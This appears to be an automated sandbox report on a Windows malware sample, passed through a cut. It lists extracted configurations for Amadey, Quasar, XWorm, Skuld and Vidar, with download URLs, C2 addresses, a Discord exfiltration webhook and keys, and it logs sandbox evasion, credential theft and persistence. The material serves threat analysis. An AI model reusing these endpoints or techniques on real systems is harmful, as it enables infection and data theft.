Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2025, 16:39
Static task
static1
General
-
Target
random.exe
-
Size
938KB
-
MD5
bcefbd57340b3f8c39699195c2946d69
-
SHA1
73eb2f2c99d6a7141fc577d9375ae3992ac58b4a
-
SHA256
8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec
-
SHA512
a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f
-
SSDEEP
24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://196.251.91.42/up/uploads/encryption02.jpg
http://196.251.91.42/up/uploads/encryption02.jpg
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.3.0.0
TELEGRAM
212.56.35.232:101
QSR_MUTEX_LoEArEgGuZRG2bQs0E
-
encryption_key
yMvSAv7B2dURg67QYU5x
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchosta
-
subdirectory
media
Extracted
skuld
https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E
Extracted
xworm
5.0
httpss.myvnc.com:1907
xWIArEKzuXpfRVkJ
-
install_file
USB.exe
Signatures
-
Amadey family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/3444-137-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/3444-204-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/3444-647-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/3444-2623-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/2540-36183-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral2/memory/4396-36676-0x0000000009900000-0x0000000009D96000-memory.dmp family_xworm -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3540 4820 conhost.exe 98 -
Quasar family
-
Quasar payload 5 IoCs
resource yara_rule behavioral2/memory/3212-30258-0x0000000000190000-0x000000000063C000-memory.dmp family_quasar behavioral2/memory/3212-30259-0x0000000000190000-0x000000000063C000-memory.dmp family_quasar behavioral2/memory/3212-30270-0x0000000000190000-0x000000000063C000-memory.dmp family_quasar behavioral2/memory/2172-30271-0x0000000000640000-0x0000000000AEC000-memory.dmp family_quasar behavioral2/memory/2172-30272-0x0000000000640000-0x0000000000AEC000-memory.dmp family_quasar -
Skuld family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 9420 created 3060 9420 Organizations.com 51 PID 9036 created 3548 9036 aspnet_compiler.exe 56 -
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ k3t05Da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f76de72994.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4wAPcC0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 16 3556 powershell.exe 297 9544 powershell.exe 306 9544 powershell.exe 317 4028 powershell.exe 321 4396 powershell.exe 335 4396 powershell.exe -
pid Process 4028 powershell.exe 9148 powershell.exe 9544 powershell.exe 3204 powershell.exe 11920 powershell.exe 3556 powershell.exe 2024 powershell.exe 4012 powershell.exe 4396 powershell.exe 8980 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 237 6024 rapes.exe 245 6024 rapes.exe 29 6024 rapes.exe 29 6024 rapes.exe 29 6024 rapes.exe 29 6024 rapes.exe 29 6024 rapes.exe 241 5292 svchost.exe 268 6024 rapes.exe 268 6024 rapes.exe 268 6024 rapes.exe 293 6024 rapes.exe 16 3556 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1728 chrome.exe 4144 chrome.exe 3528 chrome.exe 876 msedge.exe 3600 msedge.exe 4304 msedge.exe 5200 chrome.exe 5320 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion k3t05Da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f76de72994.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion k3t05Da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f76de72994.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4wAPcC0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4wAPcC0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation f76de72994.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation zx4PJh6.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation k3t05Da.exe -
Deletes itself 1 IoCs
pid Process 7064 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat cmd.exe -
Executes dropped EXE 27 IoCs
pid Process 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 6024 rapes.exe 3444 f76de72994.exe 5952 wjfOfXh.exe 1444 OkH8IPF.exe 2984 weC48Q7.exe 2256 windowscore.exe 4668 ARxx7NW.exe 4104 tK0oYx3.exe 1984 0000013728.exe 2172 rapes.exe 4968 d3jhg_003.exe 6076 tzutil.exe 7064 w32tm.exe 3212 4wAPcC0.exe 2172 svchost.exe 6184 zx4PJh6.exe 8672 Attributes.exe 9420 Organizations.com 7240 50KfF6O.exe 8272 k3t05Da.exe 9012 XEh4XP0.exe 9588 XEh4XP0.exe 11924 FdqlBTs.exe 11764 659c4db84b.exe 2540 k3t05Da.exe 12796 rapes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 4wAPcC0.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine svchost.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine f76de72994.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe -
Loads dropped DLL 48 IoCs
pid Process 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 2256 windowscore.exe 8272 k3t05Da.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/files/0x000500000001ee83-33218.dat agile_net behavioral2/memory/8272-33250-0x00000000008E0000-0x0000000000ECC000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x001200000001f2a0-33263.dat themida behavioral2/memory/8272-33265-0x000000006EEF0000-0x000000006F4D0000-memory.dmp themida behavioral2/memory/8272-35380-0x000000006EEF0000-0x000000006F4D0000-memory.dmp themida behavioral2/memory/8272-36185-0x000000006EEF0000-0x000000006F4D0000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" 50KfF6O.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" FdqlBTs.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k3t05Da.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 265 ip-api.com -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2088 tasklist.exe 5424 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 6024 rapes.exe 3444 f76de72994.exe 2172 rapes.exe 3212 4wAPcC0.exe 2172 svchost.exe 12796 rapes.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1444 set thread context of 4520 1444 OkH8IPF.exe 117 PID 4104 set thread context of 5732 4104 tK0oYx3.exe 147 PID 8672 set thread context of 9036 8672 Attributes.exe 190 PID 11764 set thread context of 12144 11764 659c4db84b.exe 208 PID 8272 set thread context of 2540 8272 k3t05Da.exe 209 PID 9544 set thread context of 12624 9544 powershell.exe 210 PID 9036 set thread context of 9780 9036 aspnet_compiler.exe 218 -
resource yara_rule behavioral2/files/0x000200000001e76c-32475.dat upx behavioral2/memory/7240-32510-0x0000000000980000-0x000000000140E000-memory.dmp upx behavioral2/memory/7240-32526-0x0000000000980000-0x000000000140E000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\RuntimeApp\0000013728.exe ARxx7NW.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe File created C:\Windows\Tasks\rapes.job Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\CylinderPair zx4PJh6.exe File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 13068 9420 WerFault.exe 177 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k3t05Da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XEh4XP0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XEh4XP0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wjfOfXh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4wAPcC0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f76de72994.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d3jhg_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizations.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k3t05Da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 f76de72994.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString f76de72994.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5020 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871351727122914" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 11952 schtasks.exe 2228 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3556 powershell.exe 3556 powershell.exe 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 6024 rapes.exe 6024 rapes.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 5952 wjfOfXh.exe 5952 wjfOfXh.exe 3444 f76de72994.exe 3444 f76de72994.exe 5200 chrome.exe 5200 chrome.exe 4520 MSBuild.exe 4520 MSBuild.exe 4520 MSBuild.exe 4520 MSBuild.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 3444 f76de72994.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 5732 MSBuild.exe 5732 MSBuild.exe 5732 MSBuild.exe 5732 MSBuild.exe 2172 rapes.exe 2172 rapes.exe 4012 powershell.exe 4012 powershell.exe 4012 powershell.exe 3204 powershell.exe 3204 powershell.exe 3204 powershell.exe 3212 4wAPcC0.exe 3212 4wAPcC0.exe 2172 svchost.exe 2172 svchost.exe 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 4088 fontdrvhost.exe 4088 fontdrvhost.exe 4088 fontdrvhost.exe 4088 fontdrvhost.exe 9012 XEh4XP0.exe 9012 XEh4XP0.exe 9012 XEh4XP0.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4968 d3jhg_003.exe 4968 d3jhg_003.exe 4968 d3jhg_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 876 msedge.exe 876 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3556 powershell.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeShutdownPrivilege 5200 chrome.exe Token: SeCreatePagefilePrivilege 5200 chrome.exe Token: SeDebugPrivilege 2256 windowscore.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 1984 0000013728.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeDebugPrivilege 3204 powershell.exe Token: SeDebugPrivilege 3212 4wAPcC0.exe Token: SeDebugPrivilege 2172 svchost.exe Token: SeDebugPrivilege 2088 tasklist.exe Token: SeDebugPrivilege 5424 tasklist.exe Token: SeDebugPrivilege 7240 50KfF6O.exe Token: SeDebugPrivilege 8672 Attributes.exe Token: SeIncreaseQuotaPrivilege 8716 WMIC.exe Token: SeSecurityPrivilege 8716 WMIC.exe Token: SeTakeOwnershipPrivilege 8716 WMIC.exe Token: SeLoadDriverPrivilege 8716 WMIC.exe Token: SeSystemProfilePrivilege 8716 WMIC.exe Token: SeSystemtimePrivilege 8716 WMIC.exe Token: SeProfSingleProcessPrivilege 8716 WMIC.exe Token: SeIncBasePriorityPrivilege 8716 WMIC.exe Token: SeCreatePagefilePrivilege 8716 WMIC.exe Token: SeBackupPrivilege 8716 WMIC.exe Token: SeRestorePrivilege 8716 WMIC.exe Token: SeShutdownPrivilege 8716 WMIC.exe Token: SeDebugPrivilege 8716 WMIC.exe Token: SeSystemEnvironmentPrivilege 8716 WMIC.exe Token: SeRemoteShutdownPrivilege 8716 WMIC.exe Token: SeUndockPrivilege 8716 WMIC.exe Token: SeManageVolumePrivilege 8716 WMIC.exe Token: 33 8716 WMIC.exe Token: 34 8716 WMIC.exe Token: 35 8716 WMIC.exe Token: 36 8716 WMIC.exe Token: SeIncreaseQuotaPrivilege 8716 WMIC.exe Token: SeSecurityPrivilege 8716 WMIC.exe Token: SeTakeOwnershipPrivilege 8716 WMIC.exe Token: SeLoadDriverPrivilege 8716 WMIC.exe Token: SeSystemProfilePrivilege 8716 WMIC.exe Token: SeSystemtimePrivilege 8716 WMIC.exe Token: SeProfSingleProcessPrivilege 8716 WMIC.exe Token: SeIncBasePriorityPrivilege 8716 WMIC.exe Token: SeCreatePagefilePrivilege 8716 WMIC.exe Token: SeBackupPrivilege 8716 WMIC.exe Token: SeRestorePrivilege 8716 WMIC.exe Token: SeShutdownPrivilege 8716 WMIC.exe Token: SeDebugPrivilege 8716 WMIC.exe Token: SeSystemEnvironmentPrivilege 8716 WMIC.exe Token: SeRemoteShutdownPrivilege 8716 WMIC.exe Token: SeUndockPrivilege 8716 WMIC.exe Token: SeManageVolumePrivilege 8716 WMIC.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2784 random.exe 2784 random.exe 2784 random.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 5200 chrome.exe 876 msedge.exe 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com 9780 AddInProcess.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2784 random.exe 2784 random.exe 2784 random.exe 9420 Organizations.com 9420 Organizations.com 9420 Organizations.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2172 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 5396 2784 random.exe 85 PID 2784 wrote to memory of 5396 2784 random.exe 85 PID 2784 wrote to memory of 5396 2784 random.exe 85 PID 2784 wrote to memory of 5608 2784 random.exe 86 PID 2784 wrote to memory of 5608 2784 random.exe 86 PID 2784 wrote to memory of 5608 2784 random.exe 86 PID 5396 wrote to memory of 2228 5396 cmd.exe 88 PID 5396 wrote to memory of 2228 5396 cmd.exe 88 PID 5396 wrote to memory of 2228 5396 cmd.exe 88 PID 5608 wrote to memory of 3556 5608 mshta.exe 90 PID 5608 wrote to memory of 3556 5608 mshta.exe 90 PID 5608 wrote to memory of 3556 5608 mshta.exe 90 PID 3556 wrote to memory of 3196 3556 powershell.exe 96 PID 3556 wrote to memory of 3196 3556 powershell.exe 96 PID 3556 wrote to memory of 3196 3556 powershell.exe 96 PID 3196 wrote to memory of 6024 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 99 PID 3196 wrote to memory of 6024 